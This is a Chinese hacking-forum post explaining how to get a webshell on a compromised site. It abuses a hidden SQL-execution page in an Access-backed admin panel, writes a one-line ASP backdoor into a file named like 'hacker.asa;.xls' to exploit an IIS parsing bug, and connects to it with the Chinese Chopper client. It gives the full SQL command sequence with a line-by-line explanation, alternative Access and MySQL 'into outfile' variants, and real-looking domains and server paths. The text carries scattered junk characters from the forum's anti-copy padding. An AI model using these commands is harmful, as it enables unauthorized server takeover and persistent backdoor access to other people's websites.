找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2007|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
; s% w# c/ g" c' _- \1 U9 h- ~5 D0 ewebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的; H; t9 ^' w1 z! K" l6 L% P; p8 T, g
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,, X2 D& {% a% o- O, N
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
* q1 w0 d8 |7 m1 e) ~9 `1.create table cmd (a varchar(50))
, R* Q* ~& f/ }8 B: D2.insert into cmd (a) values (‘‘)) L. L  `# f% h; \. w
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd9 A, K9 L: }. \8 o2 r! u
(把表cmd的内容导出为物理路径的一个EXCEL文件)
7 d( J2 N: m# j9 k9 I0 p& h% u6 O+ t4.drop table cmd( o# |5 P5 y% x7 F
利用IIS的BUG成功拿到了WEBSHELL。
+ e$ E: f* z6 o, q: P! C( Z0 V+ |$ f! l  _( D& C: `
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
1 R1 M  b$ l; q+ ]0 g/ P, o& D( O  P* Y) t1 {- B
  SQL语句意思解释:
$ I! E, }7 r7 z  ]3 }5 x% Y6 |  第一句
+ v7 J0 q+ ^( G" o  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
; i( o' s& M5 [6 O4 b1 w
" X5 |' K1 C4 D4 K# z  第二句5 J4 B' i7 e# ?6 ?9 y
  在表cmd的a字段插入一句话木马
8 `, I8 {8 C7 w; r% S- t  第三句! B, C/ ?4 ^2 \  |; l  K, C% {
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件  M* m+ U" G- ^  u' O
: I3 g7 s! ^9 |, J5 y3 \
  第四句
! Z! N5 H* E6 T% v  删除建立的cmd表5 n( p& V$ {4 o
, A4 O% {% t( p$ t& [6 d: v
  以下内容为测试:
3 e! _% R2 S8 f5 s  Access利用后台SQL执行命令功能导出WebShell:
& Y* ?# g. t6 B: }1 R: A2 ?& q  这个更简单:
# q8 w2 y6 |5 c  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]! h& G( [- G* S9 b3 y
  或者% v" }; x5 q5 x1 n
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
/ y. M( g% T$ q. w9 T; _, A: v& H
  后台有执行SQL语句功能(vote为已知表段)( b# R5 B/ L  j% G/ y+ Z3 m
  希望对大家有所帮助拿shell的又一个思路! y+ U5 u! [0 |  K7 k$ n3 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表